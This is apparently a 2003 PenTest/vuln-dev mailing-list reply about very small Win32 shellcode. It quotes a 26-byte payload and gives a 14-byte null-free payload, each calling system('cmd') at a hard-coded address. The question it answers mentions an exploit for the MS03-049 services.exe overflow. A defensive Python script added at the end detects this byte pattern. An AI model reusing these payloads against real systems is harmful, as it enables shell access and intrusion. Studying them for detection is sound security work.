RE: [PenTest] Re: Win32 Shellcode question.
From: Brett Moore (brett.moore_at_security-assessment.com)
Date: 12/01/03
To: <PenTest@yahoogroups.com>, <vuln-dev@securityfocus.com> Date: Tue, 2 Dec 2003 11:34:30 +1300
> http://www.newroot.de/projects/winsys.c
> // very small win2000/NT local shellcode (smallest i've seen)
> /* 26byte execute system("cmd.exe "); written by newroot */
> unsigned char hellcode[]=
> "\x8b\xec" // mov ebp, esp
> "\x55" // push ebp
> "\x8b\xec" // mov ebp, esp
> "\x68\x65\x78\x65\x20" // push 0x20657865
> "\x68\x63\x6d\x64\x2e" // push 0x2e646d63
> "\x8d\x45\xf8" // lea eax,[ebp-0x8]
> "\x50" // push eax
> "\xb8" // mov eax,
> "\xad\xaa\x01\x78" // 0x7801aaad <- address of system()
> "\xff\xd0" // call eax
> ;
; 14 byte no null byte execute system("cmd")
54 push esp ; or pushf to put null terminator on stack
68 63 6D 64 20 push 20646D63h ; push cmd
54 push esp ; push location of cmd
B8 BF 8E 01 78 mov eax,78018EBFh ; address of system()
FF D0 call eax ; call system
-----Original Message-----
From: Tobias Klein [mailto:tobias.klein@ewetel.de]
Sent: Monday, December 01, 2003 9:07 PM
To: Vinay A. Maha***; vuln-dev@securityfocus.com;
pentest@yahoogroups.com
Subject: [PenTest] Re: Win32 Shellcode question.
http://www.newroot.de/projects/winsys.c
greets newroot
At 19:29 27.11.2003 -0800, Vinay A. Maha*** wrote:
>I was writing an exploit for the MS03-049 services.exe
>stack overflow vuln
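
An added example, not part of the original messages or of the newroot code: a Python triage sketch a defender could run over a captured buffer to spot the idiom both listings above share, ASCII text built with `push imm32` followed by `mov eax, imm32` / `call eax` to a hard-coded address. The function names are hypothetical, the sample bytes are the ones quoted in the message, and the scan is a linear byte match rather than a disassembler, so a single signal can be a false positive.

```python
import struct

# Sample input: the two byte sequences quoted in the message, transcribed as hex.
LISTING_26 = bytes.fromhex("8bec558bec6865786520" "68636d642e8d45f850" "b8adaa0178ffd0")
LISTING_14 = bytes.fromhex("5468636d642054" "b8bf8e0178ffd0")

def find_abs_calls(buf):
    """Return (offset, target) for each `mov eax, imm32; call eax` (B8 imm32 FF D0)."""
    hits = []
    i = buf.find(b"\xb8")
    while i != -1 and i + 7 <= len(buf):
        if buf[i + 5:i + 7] == b"\xff\xd0":
            hits.append((i, struct.unpack_from("<I", buf, i + 1)[0]))
        i = buf.find(b"\xb8", i + 1)
    return hits

def pushed_strings(buf):
    """Reassemble ASCII text built from consecutive `push imm32` (68 imm32)."""
    out, run, i = [], [], 0
    while i < len(buf):
        chunk = buf[i + 1:i + 5]
        if buf[i] == 0x68 and len(chunk) == 4 and all(0x20 <= c < 0x7F for c in chunk):
            run.append(chunk)      # printable dword pushed onto the stack
            i += 5
            continue
        if run:
            # The stack grows down, so the last dword pushed is the start of the string.
            out.append(b"".join(reversed(run)).decode("ascii"))
            run = []
        i += 1
    if run:
        out.append(b"".join(reversed(run)).decode("ascii"))
    return out

def triage(buf):
    """Summarise a buffer; flag it only when both signals are present."""
    calls, strings = find_abs_calls(buf), pushed_strings(buf)
    return {
        "length": len(buf),
        "has_null": 0 in buf,      # a NUL byte would truncate a C-string copy
        "abs_calls": calls,
        "strings": strings,
        "suspicious": bool(calls and strings),
    }

if __name__ == "__main__":
    for name, data in (("26-byte", LISTING_26), ("14-byte", LISTING_14)):
        print(name, triage(data))
```

Requiring both signals keeps ordinary text that happens to contain the letter h (0x68) from being flagged on its own.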